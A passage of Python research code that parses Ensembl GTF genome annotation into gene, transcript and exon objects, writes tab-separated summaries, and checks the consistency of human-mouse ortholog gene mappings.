elemType==\"transcript\":\n\t\t\t\tnewTranscript=EnsemblTranscript(line)\n\t\t\t\ttranscriptDic[newTranscript.basicInfoDic[\"transcript_id\"]]=newTranscript\n\t\t\t\tgeneId=newTranscript.basicInfoDic[\"gene_id\"]\n\t\t\t\tgeneDic[geneId].add_transcript(newTranscript)\n\t\t\telif elemType==\"exon\":\n\t\t\t\tnewExon=EnsemblExon(line)\n\t\t\t\tlastReadExon=newExon.basicInfoDic[\"exon_id\"]\n\t\t\t\t\n\t\t\t\t# DELETEME!!\n\t\t\t\t#print(\"ALL_EXON_ENTRY\\t%s\\n\" % (newExon.get_summary_string())),\n\n\t\t\t\t# Make sure to store certain information about the exon if it appears multiple times\n\t\t\t\tif lastReadExon not in exonDic:\n\t\t\t\t\texonDic[lastReadExon]=newExon\n\t\t\t\telse:\n\t\t\t\t\t# DELETEME!!\n\t\t\t\t\t#print(\"DUPLICATE_EXON_ENTRY\\t%s\\t%s\\n\" % (exonDic[lastReadExon].get_summary_string(),newExon.get_summary_string())),\n\t\t\t\t\texonDic[lastReadExon].add_another_instance(newExon)\n\t\t\t\t#\n\t\t\t\tgeneId=newExon.basicInfoDic[\"gene_id\"]\n\t\t\t\ttranscriptId=newExon.basicInfoDic[\"transcript_id\"]\n\t\t\t\t## Add the exon to a gene, don't care about ordering and simply owerwrite if exists\n\t\t\t\tgeneDic[geneId].add_exon(newExon)\n\t\t\t\t## Add to exon to a transcript, make sure this exon insertion is ordered\n\t\t\t\t## Luckily entrys come ordered!\n\t\t\t\t## also same exon doesn't appear twice in once transcript so that case is not handled\n\t\t\t\ttranscriptDic[transcriptId].add_exon(newExon)\n\t\t\t\t## no need for below line because Python is Pass-by-object-reference\n\t\t\t\t#geneDic[geneId].transcripts[transcriptId].add_exon(newExon)\n\t\t\telif elemType==\"CDS\":\n\t\t\t\t#meaning previously read exon is completely/partially coding\n\t\t\t\tnewLocus=EnsemblLocus(line)\n\t\t\t\ttranscriptDic[transcriptId].handle_CDS(newLocus)\n\t\t\t\texonDic[lastReadExon].handle_CDS(newLocus)\n\t\t\t\t# DELETEME!!\n\t\t\t\t#print \"handleCDS\\t%s\\t%s\\n\" % (lastReadExon,newLocus.get_summary_string()),\n\t\t\telif elemType==\"UTR\" or elemType==\"stop_codon\" or elemType==\"start_codon\":\n\t\t\t\tnewLocus=EnsemblLocus(line)\n\t\t\t\ttranscriptDic[transcriptId].add_locus(newLocus,elemType)\n\t\t\t#\n\t\t\tif elemType not in elemCounts:\n\t\t\t\telemType=\"other\"\n\t\t\telemCounts[elemType]=elemCounts[elemType]+1\n\t\t\tlineCount+=1\n\t\t\tif lineCount%100000==0:\n\t\t\t\tsys.stderr.write(str(lineCount)+\"\\t\")\n\t\t#\n\t#\n\tsys.stderr.write(\"\\n\")\n\tsys.stderr.write(\"GTF parsing summary: \" 
+repr(elemCounts)+\"\\n\\n\")\n\tinfile.close()\n\tif outdir!=\"None\":\n\t\tprint_some_summary(orgID, geneDic,transcriptDic,exonDic,elemCounts, outdir)\n\treturn (geneDic,transcriptDic,exonDic,infoDic)\n\n\ndef print_some_summary(orgID, geneDic,transcriptDic,exonDic,elemCounts, outdir):\n\t\"\"\"\n\tPrint a summary for the genes, transcripts and exons in the\n\tread GTF file.\n\t\"\"\"\n\toutfile=open(outdir+\"/\"+orgID+\"-allGenes-GTFparsed.txt\",'w')\n\toutfile.write(\"chrName\\tstartCoord\\tendCoord\\tstrand\\tgeneID\\tgeneName\\tgeneType\\tnoOfTranscripts\\tnoOfExons\\telementType\\n\")\n\tfor g in geneDic:\n\t\toutfile.write(geneDic[g].get_summary_string()+\"\\n\")\n\t\t#print geneDic[g].get_summary_string()\n\t#\n\toutfile.close()\n\n\ttotalNumberOfExons=0\n\toutfile=open(outdir+\"/\"+orgID+\"-allTranscripts-GTFparsed.txt\",'w')\n\toutfile.write(\"chrName\\tstartCoord\\tendCoord\\tstrand\\ttranscriptID\\ttranscriptName\\ttranscriptType\\tgeneID\\tgeneName\\texonIDs\\texonTypes\\texonStarts\\texonEnds\\tcodingStarts\\tcodingEnds\\tstartCodon\\tstopCodon\\tUTRstarts\\tUTRends\\tproteinID\\telementType\\n\")\n\tfor t in transcriptDic:\n\t\toutfile.write(transcriptDic[t].get_summary_string()+\"\\n\")\n\t\ttotalNumberOfExons+=len(transcriptDic[t].exon_types)\n\t\t#print transcriptDic[t].get_summary_string()\n\t#\n\toutfile.close()\n#\tprint [\"totalNumberOfExons\", totalNumberOfExons]\n\n\toutfile=open(outdir+\"/\"+orgID+\"-allExons-GTFparsed.txt\",'w')\n\toutfile.write(\"chrName\\tstartCoord\\tendCoord\\tstrand\\texonID\\texonType\\tcodingStart\\tcodingEnd\\ttranscriptIDs\\texonNumbers\\tgeneID\\texonLength\\tacceptor2bp\\tdonor2bp\\tavgCodingConsScore\\tavgConsScore\\tfirstMidLastCounts\\telementType\\n\")\n\tfor e in exonDic:\n\t\toutfile.write(exonDic[e].get_summary_string()+\"\\n\")\n\t\t#print exonDic[e].get_summary_string()\n\t#\n\toutfile.close()\n\n\treturn\n\ndef overlapping_combined( orig_data, reverse = False):\n \"\"\"\n Return list of intervals with overlapping neighbours merged together\n Assumes sorted intervals unless reverse is set\n\n \"\"\"\n if not orig_data or not len(orig_data): return []\n if len(orig_data) == 1:\n return orig_data\n\n new_data = []\n\n if reverse:\n data = orig_data[:]\n data.reverse()\n else:\n data = orig_data\n\n if not data[0][0] <= data[1][0]:\n print((data, reverse))\n assert(data[0][0] <= data[1][0])\n\n # start with the first interval\n prev_beg, prev_end = data[0]\n\n # check if any subsequent intervals overlap\n for beg, end in data[1:]:\n if beg - prev_end + 1 > 0:\n new_data.append((prev_beg, prev_end))\n prev_beg = beg\n prev_end = max(end, prev_end)\n\n new_data.append((prev_beg, prev_end))\n\n if reverse:\n new_data.reverse()\n return new_data\n\n\ndef get_overlap_between_intervals(a, b):\n\t\"\"\"\n\tFinds the overlap between two intervals end points inclusive.\n\t#Makes sure not to report overlap beyond either interval length.\n\t#\ta=[10,20]; b=[10,20] --> f(a,b)=10 !(not 11)\n\t#\ta=[10,20]; b=[20,30] --> f(a,b)=1\n\t\ta=[10,20]; b=[15,30] --> f(a,b)=6\n\t\"\"\"\n\t#lena=abs(float(a[1])-float(a[0]))\n\t#lenb=abs(float(b[1])-float(b[0]))\n\toverlap=max(0, min(float(a[1]), float(b[1])) - max(float(a[0]), float(b[0]))+1)\n\t#minlen=min(lena,lenb)\n\t#return min(minlen,overlap)\n\treturn overlap\n\ndef sort_by_column(somelist, n):\n\t\"\"\"\n\tGiven a list with 1 or more columns this functions sorts it according \n\tto the desired column n [0 len(list)). 
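For example, sort_by_column([[3,'c'],[1,'a'],[2,'b']], 0) reorders the list to [[1,'a'],[2,'b'],[3,'c']].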
Does this in-place.\n\t\"\"\"\n\tsomelist[:] = [(x[n], x) for x in somelist]\n\tsomelist.sort()\n\tsomelist[:] = [val for (key, val) in somelist]\n\treturn\n\ndef chr_name_conversion(chrIn,org):\n\t\"\"\"\n\tGiven an identifier for the chromosome name (str) or a chromosome number (int) \n\tand an organism this function converts the identifier to the other representation. \n\tExample: \n\t\tconverts 'chrX' or 'X' to 23 for human\n\t\tconverts 23 to 'chrX' and 1 to 'chr1' for human\n\t\"\"\"\n\tif isinstance(chrIn, int): # int to str\n\t\tif org=='human':\n\t\t\tif\tchrIn<23 and chrIn>0:\n\t\t\t\tchrOut='chr'+str(chrIn)\n\t\t\telif chrIn==23:\n\t\t\t\tchrOut='chrX'\n\t\t\telif chrIn==24:\n\t\t\t\tchrOut='chrY'\n\t\t\telse:\n\t\t\t\treturn 'problem'\n\t\telif org=='mouse':\n\t\t\tif\tchrIn<20 and chrIn>0:\n\t\t\t\tchrOut='chr'+str(chrIn)\n\t\t\telif chrIn==20:\n\t\t\t\tchrOut='chrX'\n\t\t\telif chrIn==21:\n\t\t\t\tchrOut='chrY'\n\t\t\telse:\n\t\t\t\treturn 'problem'\n\t\telse:\n\t\t\tchrOut='chr'+str(chrIn)\n\telse: # str to int\n\t\tif 'chr' in chrIn:\n\t\t\tchrIn=chrIn[3:] # cut the 'chr' prefix\n\t\tif org=='human':\n\t\t\tif\tchrIn=='X':\n\t\t\t\tchrOut=23\n\t\t\telif chrIn=='Y':\n\t\t\t\tchrOut=24\n\t\t\telse:\n\t\t\t\tchrOut=int(chrIn)\n\t\telif org=='mouse':\n\t\t\tif\tchrIn=='X':\n\t\t\t\tchrOut=20\n\t\t\telif chrIn=='Y':\n\t\t\t\tchrOut=21\n\t\t\telse:\n\t\t\t\tchrOut=int(chrIn)\n\treturn chrOut\n\n\n\n################################# BEGIN ExtendedExon ##################################\n### NOT USED FOR NOW, NOT YET IMPLEMENTED ####\nclass ExtendedExon:\n\t\"\"\"\n\tThis class is a container for exons that combines input from multiple different\n\tsources/files. Below is a list of these sources:\n\t\t- Ensembl Exon: This will initiate the instance of the ExtendedExon class \n\t\t- LiftOver Files:\n\t\t- Genomedata Archive:\n\t\t- PhastCons Scores:\n\t\t- BLAT within species: \n\t\"\"\"\n\tdef __init__(self, ensemblExon):\n\t\tself.basicInfoDic= ensemblExon.basicInfoDic\n################################# END ExtendedExon ##################################\n\n\n\n################################# BEGIN EnsemblExon ##################################\nclass EnsemblExon:\n\t\"\"\"\n\tThis class is a container for Ensembl exons\n\t\"\"\"\n\tdef __init__(self, line):\n\t\t# parse the exon line\n\t\tchr,d,elemType,start_coord,end_coord,d,strand,d,others=line.rstrip().split(\"\\t\")\n\t\tif elemType!=\"exon\":\n\t\t\tsys.exit(\"Not an exon parsed in class EnsemblExon:\\t\"+elemType)\n\t\t#\n\t\t#basic information about the exon\n\t\tself.basicInfoDic={\"chromosome\" : chr, \"start_coord\" : int(start_coord), \"end_coord\" : int(end_coord), \"strand\" : strand}\n\n\t\t# there are 13 or more items for exons. 
We keep only 7 relevant ones.\n\t\t# e.g: gene_id \"ENSG00000167468\"; gene_version \"14\"; \n\t\t#\ttranscript_id \"ENST00000593032\"; transcript_version \"3\"; exon_number \"2\"; \n\t\t#\tgene_name \"GPX4\"; gene_source \"ensembl_havana\"; gene_biotype \"protein_coding\"; \n\t\t#\ttranscript_name \"GPX4-006\"; transcript_source \"havana\"; transcript_biotype \"protein_coding\"; \n\t\t#\texon_id \"ENSE00003420595\"; exon_version \"1\"; tag \"seleno\"; tag \"cds_end_NF\"; \n\t\titems=others.replace('\"', '').split(\";\")\n\t\tfor item in items:\n\t\t\twds=item.lstrip().split()\n\t\t\tif len(wds)>1:\n\t\t\t\tkey, val = wds[0],wds[1]\n\t\t\t\tif key in [\"gene_id\", \"gene_name\", \"transcript_id\", \"transcript_name\", \"transcript_biotype\", \"exon_id\", \"exon_number\"]:\n\t\t\t\t\tself.basicInfoDic[key]=val\n\t\t#\n\n\t\tself.exon_type = \"nonCoding\" # by default\n\t\tself.codingExon = [-1,-1] # the coordinates of below codingExon will change if partialCoding or coding\n\t\tself.transcriptIds=[self.basicInfoDic[\"transcript_id\"]]\n\t\tself.exonNumbers=[int(self.basicInfoDic[\"exon_number\"])]\n\t\tself.acceptor2bp=\"NN\"\n\t\tself.donor2bp=\"NN\"\n\t\tself.phastConsScores=[]\n\t\tself.avgConsScore=0\n\t\tself.avgCodingConsScore=0\n\t\tself.firstMidLast=[0,0,0] # appearences of this exon as first, mid and last exons. Single exons are counted as first and last.\n\t#\n\n\tdef handle_CDS(self,newLocus):\n\t\tlastSt, lastEn=self.basicInfoDic[\"start_coord\"], self.basicInfoDic[\"end_coord\"]\n\t\tnewSt, newEn= newLocus.basicInfoDic[\"start_coord\"], newLocus.basicInfoDic[\"end_coord\"]\t\n\t\tif lastSt==newSt and lastEn==newEn:\n\t\t\tself.exon_type=\"fullCoding\"\n\t\telif get_overlap_between_intervals([lastSt,lastEn], [newSt,newEn])>0:\n\t\t\tself.exon_type=\"partCoding\"\n\t\telse:\n\t\t\tsys.exit(\"Reached a CDS entry that doesn't overlap with previous exon\\t\"\\\n\t\t\t\t+newLocus.get_summary_string()+\"\\n\") \n\t\t#\n\t\tself.codingExon=[newSt,newEn]\n\t#\n\tdef add_another_instance(self,newExon):\n\t\t# an exon may appear in only one gene but for many different transcripts\n\t\tself.transcriptIds.append(newExon.basicInfoDic[\"transcript_id\"])\n\t\tself.exonNumbers.append(int(newExon.basicInfoDic[\"exon_number\"]))\n\t#\n\t# data containers within this class\n\t__slots__ = [\"basicInfoDic\", \"exon_type\", \"codingExon\", \"transcriptIds\", \"exonNumbers\", \\\n\t\t\t\"acceptor2bp\", \"donor2bp\", \"phastConsScores\", \"avgCodingConsScore\", \"avgConsScore\", \"firstMidLast\"]\n\n\t# get one liner summary of the given instance\n\tdef get_summary_string(self):\n\t\tsummary=\"chr\"+self.basicInfoDic[\"chromosome\"]+\"\\t\"+str(self.basicInfoDic[\"start_coord\"])+\"\\t\"+\\\n\t\t\tstr(self.basicInfoDic[\"end_coord\"])+\"\\t\"+self.basicInfoDic[\"strand\"]+\"\\t\"+self.basicInfoDic[\"exon_id\"]+\"\\t\"+\\\n\t\t\tself.exon_type +\"\\t\"+str(self.codingExon[0])+\"\\t\"+str(self.codingExon[1])+\"\\t\"+\\\n\t\t\t\",\".join(self.transcriptIds)+\"\\t\"+\",\".join([str(e) for e in self.exonNumbers])+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"gene_id\"]+\"\\t\"+str(abs(self.basicInfoDic[\"end_coord\"]-self.basicInfoDic[\"start_coord\"]))+\"\\t\"+\\\n\t\t\tself.acceptor2bp+\"\\t\"+self.donor2bp+\"\\t\"+str(self.avgCodingConsScore)+\"\\t\"+str(self.avgConsScore)+\"\\t\"+\\\n\t\t\t\",\".join([str(e) for e in self.firstMidLast])+\"\\texon\"\n\t\t\t#self.basicInfoDic[\"transcript_id\"]+\"\\t\"+self.basicInfoDic[\"exon_number\"]+\"\\t\"+\\\n\t\treturn summary\n################################# END 
EnsemblExon ##################################\n\n################################# BEGIN EnsemblLocus ##################################\nclass EnsemblLocus:\n\t\"\"\"\n\tThis class is a container for a basic locus that has chr, start, end, strand \n\tfields. UTRs, start and stop codons from Ensembl are of this type.\n\t\"\"\"\n\tdef __init__(self, line):\n\t\t# parse the locus line\n\t\tchr,d,elemType,start_coord,end_coord,d,strand,d,others=line.rstrip().split(\"\\t\")\n\t\tif elemType!=\"UTR\" and elemType!=\"stop_codon\" and elemType!=\"start_codon\" and elemType!=\"CDS\":\n\t\t\tsys.exit(\"Not a basic locus as intended parsed in from Ensemble line:\\t\"+line)\n\t\t#\n\t\t#basic information about the locus\n\t\tself.basicInfoDic={\"chromosome\" : chr, \"start_coord\" : int(start_coord), \\\n\t\t\t\"end_coord\" : int(end_coord), \"strand\" : strand, \"locus_type\" : elemType}\n\n\t\titems=others.replace('\"', '').split(\";\")\n\t\tfor item in items:\n\t\t\twds=item.lstrip().split()\n\t\t\tif len(wds)>1:\n\t\t\t\tkey, val = wds[0],wds[1]\n\t\t\t\tif key in [\"gene_id\", \"gene_name\", \"transcript_id\", \"transcript_name\", \"transcript_biotype\", \"protein_id\"]:\n\t\t\t\t\tself.basicInfoDic[key]=val\n\t\t#\n\n\n\t\t#\n\n\t__slots__ = [\"basicInfoDic\"]\n\n\t# get one liner summary of the given instance\n\tdef get_summary_string(self):\n\t\tsummary=\"chr\"+self.basicInfoDic[\"chromosome\"]+\"\\t\"+str(self.basicInfoDic[\"start_coord\"])+\"\\t\"+\\\n\t\t\tstr(self.basicInfoDic[\"end_coord\"])+\"\\t\"+self.basicInfoDic[\"strand\"]+\"\\t\"+self.basicInfoDic[\"locus_type\"]+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"transcript_id\"]+\"\\t\"+self.basicInfoDic[\"transcript_name\"]+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"transcript_biotype\"]+\"\\t\"+self.basicInfoDic[\"gene_id\"]+\"\\t\"+self.basicInfoDic[\"gene_name\"]+\"\\tlocus\"\n\t\treturn summary\n################################# END EnsemblLocus ##################################\n\n\n################################# BEGIN EnsemblTranscript ##################################\nclass EnsemblTranscript:\n\t\"\"\"\n\tThis class is a container for Ensembl transcripts\n\t\"\"\"\n\tdef __init__(self, line):\n\t\t# parse the transcript line\n\t\tchr,d,elemType,start_coord,end_coord,d,strand,d,others=line.rstrip().split(\"\\t\")\n\t\tif elemType!=\"transcript\":\n\t\t\tsys.exit(\"Not a transcript parsed in class EnsemblTranscript:\\t\"+elemType)\n\t\t#\n\t\t#basic information about the transcript\t\n\t\tself.basicInfoDic={\"chromosome\" : chr, \"start_coord\" : int(start_coord), \"end_coord\" : int(end_coord), \"strand\" : strand}\n\n\t\t# there are 10 or more items for transcripts. 
We keep only 5 relevant ones.\n\t\t# e.g: gene_id \"ENSG00000223972\"; gene_version \"5\"; transcript_id \"ENST00000456328\"; \n\t\t#\ttranscript_version \"2\"; gene_name \"DDX11L1\"; gene_source \"havana\"; gene_biotype \"transcribed_unprocessed_pseudogene\"; \n\t\t#\ttranscript_name \"DDX11L1-002\"; transcript_source \"havana\"; transcript_biotype \"processed_transcript\";\n\t\t#\n\n\t\titems=others.replace('\"', '').split(\";\")\n\t\tfor item in items:\n\t\t\twds=item.lstrip().split()\n\t\t\tif len(wds)>1:\n\t\t\t\tkey, val = wds[0],wds[1]\n\t\t\t\t#key, val = (item.lstrip().split())[0:2]\n\t\t\t\tif key in [\"gene_id\", \"gene_name\", \"transcript_id\", \"transcript_name\", \"transcript_biotype\"]:\n\t\t\t\t\tself.basicInfoDic[key]=val\n\t\t#\n\t\tif \"gene_name\" not in self.basicInfoDic: \n\t\t\tself.basicInfoDic[\"gene_name\"]=self.basicInfoDic[\"gene_id\"]\n\t\tif \"transcript_name\" not in self.basicInfoDic: \n\t\t\tself.basicInfoDic[\"transcript_name\"]=self.basicInfoDic[\"transcript_id\"]\n\n\t\tself.start_codon=[\"cds_start_NF\"] # by default make them non-confirmed\n\t\tself.stop_codon=[\"cds_stop_NF\"] # by default make them non-confirmed\n\t\tself.exons = []\n\t\tself.codingExons = []\n\t\tself.exon_types= []\n\t\tself.protein_id=\"None\"\n\t\tself.UTRs=[]\n\t#\n\n\t# adding an exon to the list of exons of the transcript \"in order\"\n\tdef add_exon(self,newExon):\n\t\texonCountSoFar=len(self.exons)\n\t\t#print \"to add\\t\"+str(newExon.basicInfoDic[\"exon_number\"])+\"\\t\"+str(newExon.basicInfoDic[\"exon_id\"])\n\t\tif int(newExon.basicInfoDic[\"exon_number\"])==exonCountSoFar+1:\n\t\t\texonEntry=[newExon.basicInfoDic[\"start_coord\"],newExon.basicInfoDic[\"end_coord\"],\n\t\t\t\tnewExon.basicInfoDic[\"exon_id\"]]\n\t\t\tself.exons.append(exonEntry)\n \t\t\t# the coordinates of below codingExon will change if partialCoding or coding\n\t\t\tself.codingExons.append([-1,-1])\n\t\t\texonType=\"nonCoding\" # by default\n\t\t\tself.exon_types.append(exonType)\n\t\telse:\n\t\t\tsys.exit(\"Exon entry is being entered out of order to the transcript\\t\"\n\t\t\t\t+self.basicInfoDic[\"transcript_id\"])\n\t\t#\n\t#\n\tdef add_locus(self,newLocus,locus_type):\n\t\tif locus_type=='start_codon':\n\t\t\tself.start_codon=[newLocus.basicInfoDic[\"start_coord\"],newLocus.basicInfoDic[\"end_coord\"]]\n\t\telif locus_type=='stop_codon':\n\t\t\tself.stop_codon=[newLocus.basicInfoDic[\"start_coord\"],newLocus.basicInfoDic[\"end_coord\"]]\n\t\telif locus_type=='UTR':\n\t\t\tself.UTRs.append([newLocus.basicInfoDic[\"start_coord\"],newLocus.basicInfoDic[\"end_coord\"]])\n\t\telse:\n\t\t\tsys.exit(\"Unknow locus type being inserted to transcript\\t\"\\\n\t\t\t\t+self.basicInfoDic[\"transcript_id\"]) \n\t#\n\n\tdef handle_CDS(self,newLocus):\n\t\texonType=\"nonCoding\" # by default\n\t\texonCountSoFar=len(self.exons)\n\t\tlastAddedExon=self.exons[exonCountSoFar-1]\n\t\tlastSt,lastEn=self.exons[exonCountSoFar-1][0:2]\n\t\tnewSt, newEn= newLocus.basicInfoDic[\"start_coord\"], newLocus.basicInfoDic[\"end_coord\"]\t\t\n\t\tif lastSt==newSt and lastEn==newEn:\n\t\t\texonType=\"fullCoding\"\n\t\telif get_overlap_between_intervals([lastSt,lastEn], [newSt,newEn])>0:\n\t\t\texonType=\"partCoding\"\n\t\telse:\n\t\t\tsys.exit(\"Reached a CDS entry that doesn't overlap with previous exon\\t\"\\\n\t\t\t\t+newLocus.get_summary_string()+\"\\n\")\n\t\t#\n\t\tself.codingExons[exonCountSoFar-1]=[newSt,newEn]\n\t\tself.exon_types[exonCountSoFar-1]=exonType # replace with the previous nonCoding 
tag\n\t\tself.protein_id=newLocus.basicInfoDic[\"protein_id\"]\n\t#\n\n\t# data containers within this class\n\t__slots__ = [\n\t\t\t\"basicInfoDic\", \n\t\t\t\"start_codon\",\n\t\t\t\"stop_codon\",\n\t\t\t\"exons\",\n\t\t\t\"codingExons\",\n\t\t\t\"exon_types\",\n\t\t\t\"protein_id\",\n\t\t\t\"UTRs\"\n\t]\n\t# get one liner summary of the given instance\n\tdef get_summary_string(self):\n\t\tif len(self.UTRs)==0:\n\t\t\tself.UTRs.append([\"None\",\"None\"])\n\t\t#\n\t\tsummary=\"chr\"+self.basicInfoDic[\"chromosome\"]+\"\\t\"+str(self.basicInfoDic[\"start_coord\"])+\"\\t\"+\\\n\t\t\tstr(self.basicInfoDic[\"end_coord\"])+\"\\t\"+self.basicInfoDic[\"strand\"]+\"\\t\"+self.basicInfoDic[\"transcript_id\"]+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"transcript_name\"]+\"\\t\"+self.basicInfoDic[\"transcript_biotype\"]+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"gene_id\"]+\"\\t\"+self.basicInfoDic[\"gene_name\"]+\"\\t\"+\\\n\t\t\t\",\".join([e[2] for e in self.exons])+\"\\t\"+\",\".join(self.exon_types)+\"\\t\"+\\\n\t\t\t\",\".join([str(e[0]) for e in self.exons])+\"\\t\"+\",\".join([str(e[1]) for e in self.exons])+\"\\t\"+\\\n\t\t\t\",\".join([str(e[0]) for e in self.codingExons])+\"\\t\"+\",\".join([str(e[1]) for e in self.codingExons])+\"\\t\"+\\\n\t\t\t\",\".join([str(i) for i in self.start_codon])+\"\\t\"+\",\".join([str(i) for i in self.stop_codon])+\"\\t\"+\\\n\t\t\t\",\".join([str(e[0]) for e in self.UTRs])+\"\\t\"+\",\".join([str(e[1]) for e in self.UTRs])+\"\\t\"+\\\n\t\t\tself.protein_id+\"\\t\"+\"transcript\"\n\t\treturn summary\n################################# END EnsemblTranscript ##################################\n\n\n\t\t\t\n################################# BEGIN EnsemblGene ##################################\nclass EnsemblGene:\n\t\"\"\"\n\tThis class is a container for Ensembl genes.\n\t\"\"\"\n\tdef __init__(self, line):\n\t\t# parse the gene line\n\t\tchr,d,elemType,start_coord,end_coord,d,strand,d,others=line.rstrip().split(\"\\t\")\n\t\tif elemType!=\"gene\":\n\t\t\tsys.exit(\"Not a gene parsed in class EnsemblGene:\\t\"+elemType)\n\t\t#\n\t\t#basic information about the gene\t\n\t\tself.basicInfoDic={\"chromosome\" : chr, \"start_coord\" : int(start_coord), \"end_coord\" : int(end_coord), \"strand\" : strand}\n\n\t\t# there are 5 items for genes: \n\t\t# e.g: gene_id \"ENSG00000223972\"; gene_version \"5\"; gene_name \"DDX11L1\"; gene_source \"havana\"; gene_biotype \"transcribed\";\n\t\titems=others.replace('\"', '').split(\";\")\n\t\tfor item in items:\n\t\t\tif len(item)>1:\n\t\t\t\tkey, val = item.lstrip().split()\n\t\t\t\tself.basicInfoDic[key]=val\n\t\tif \"gene_name\" not in self.basicInfoDic: \n\t\t\tself.basicInfoDic[\"gene_name\"]=self.basicInfoDic[\"gene_id\"]\n\t\tself.exons = {}\n\t\tself.transcripts = {}\n\t#\n\n\t# data containers within this class\n\t__slots__ = [\n\t\t\t\"basicInfoDic\", \n\t\t\t\"exons\",\n\t\t\t\"transcripts\"]\n\n\t# adding a transcript to the gene\n\tdef add_transcript(self,newTranscript):\n\t\tself.transcripts[newTranscript.basicInfoDic[\"transcript_id\"]]=newTranscript\n\t# adding an exon to the list of exons of the gene\n\tdef add_exon(self,newExon):\n\t\tself.exons[newExon.basicInfoDic[\"exon_id\"]]=\\\n\t\t\t[newExon.basicInfoDic[\"start_coord\"],newExon.basicInfoDic[\"end_coord\"]]\n\t# get one liner summary of the given instance\n\tdef 
get_summary_string(self):\n\t\tsummary=\"chr\"+self.basicInfoDic[\"chromosome\"]+\"\\t\"+str(self.basicInfoDic[\"start_coord\"])+\"\\t\"+\\\n\t\t\tstr(self.basicInfoDic[\"end_coord\"])+\"\\t\"+self.basicInfoDic[\"strand\"]+\"\\t\"+self.basicInfoDic[\"gene_id\"]+\"\\t\"+\\\n\t\t\tself.basicInfoDic[\"gene_name\"]+\"\\t\"+self.basicInfoDic[\"gene_biotype\"]+\"\\t\"+\\\n\t\t\tstr(len(self.transcripts))+\"\\t\"+str(len(self.exons))+\"\\tgene\"\n\t\treturn summary\n\t#\n\t#def gene_wrap_up():\n\t#\tself.beg = min(self.exons[e][0] for e in self.exons)\n\t#\tself.end = max(self.exons[e][1] for e in self.exons)\n\t#\n\n################################# END EnsemblGene ##################################\n\n\ndef convert_UCSC_to_bed_format(l):\n\t\"\"\"\n\tGiven a locus in UCSC format this function converts it to bed format with 3 fields\n\tchr1:121-21111 --> ['chr1', 121, 21111]\n\t\"\"\"\n\tchr=l[:l.find(':')]\n\tst=int(l[l.find(':')+1:l.find('-')])\n\ten=int(l[l.find('-')+1:])\n\treturn (chr,st,en)\n\n\ndef consistency_check(org1TOorg2,org2TOorg1):\n\t\"\"\"\n\tCheck the consistency between the two matchings (e.g. human-to-mouse, mouse-to-human)\n\tread from separate Ensembl file. This function will do nothing if all is consistent.\n\t\"\"\"\n\tfor g1 in org1TOorg2:\n\t\ttype=org1TOorg2[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=org1TOorg2[g1][0][0]\n\t\t\tif g2 not in org2TOorg1:\n\t\t\t\tsys.exit(\"Reverse entry for a one2one match couldn't be found\\t\"+g1+\"\\t\"+g2)\n\t\t\telif org2TOorg1[g2][0][0]!=g1:\n\t\t\t\tsys.exit(\"Reverse entry for a one2one match mismatches with original one\\t\"+g1+\"\\t\"+g2)\n\t\t\t# else good\n\t\telse:\n\t\t\tfor oneMatch1 in org1TOorg2[g1]:\n\t\t\t\tg2=oneMatch1[0]\n\t\t\t\tif g2 not in org2TOorg1:\n\t\t\t\t\tsys.exit(\"Reverse entry for a NON-one2one match couldn't be found\\t\"+g1+\"\\t\"+g2)\n\t\t\t\telse:\n\t\t\t\t\treverseFound=False\n\t\t\t\t\tfor oneMatch2 in org2TOorg1[g2]:\n\t\t\t\t\t\tif oneMatch2[0]==g1:\n\t\t\t\t\t\t\treverseFound=True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t#\n\t\t\t\t\tif reverseFound==False:\n\t\t\t\t\t\tsys.exit(\"Reverse entry for a NON-one2one match mismatches with original one\\t\"+g1+\"\\t\"+g2)\n\t\t\t\t\t# else good\n\t\t\t\t#\n\t#\n\tfor g1 in org2TOorg1:\n\t\ttype=org2TOorg1[g1][0][1]\n\t\tif type==\"ortholog_one2one\":\n\t\t\tg2=org2TOorg1[g1][0][0]\n\t\t\tif g2 not in org1TOorg2:\n\t\t\t\tsys.exit(\"Reverse entry for a one2one match couldn't be found\\t\"+g1+\"\\t\"+g2)\n\t\t\telif org1TOorg2[g2][0][0]!=g1:\n\t\t\t\tsys.exit(\"Reverse entry for a one2one match mismatches with original one\\t\"+g1+\"\\t\"+g2)\n\t\t\t# else good\n\t\telse:\n\t\t\tfor oneMatch1 in org2TOorg1[g1]:\n\t\t\t\tg2=oneMatch1[0]\n\t\t\t\tif g2 not in org1TOorg2:\n\t\t\t\t\tsys.exit(\"Reverse entry for a NON-one2one match couldn't be found\\t\"+g1+\"\\t\"+g2)\n\t\t\t\telse:\n\t\t\t\t\treverseFound=False\n\t\t\t\t\tfor oneMatch2 in org1TOorg2[g2]:\n\t\t\t\t\t\tif oneMatch2[0]==g1:\n\t\t\t\t\t\t\treverseFound=True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t#\n\t\t\t\t\tif reverseFound==False:\n\t\t\t\t\t\tsys.exit(\"Reverse entry for a NON-one2one match mismatches with original one\\t\"+g1+\"\\t\"+g2)\n\t\t\t\t\t# else good\n\t\t\t\t#\n\t#\n\treturn\n\n\ndef pickle_one2one_genePairs_allInfo(genePairsDic,geneDic1,geneDic2,exonDic1,exonDic2,transcriptDic1,transcriptDic2,outdir):\n\t\"\"\"\n\tPickle the gene, transcript and exon dictionaries for each pair of ortholog_one2one genes.\n\tThere are around 16.5k such genes for human-mouse and 15.8k are 
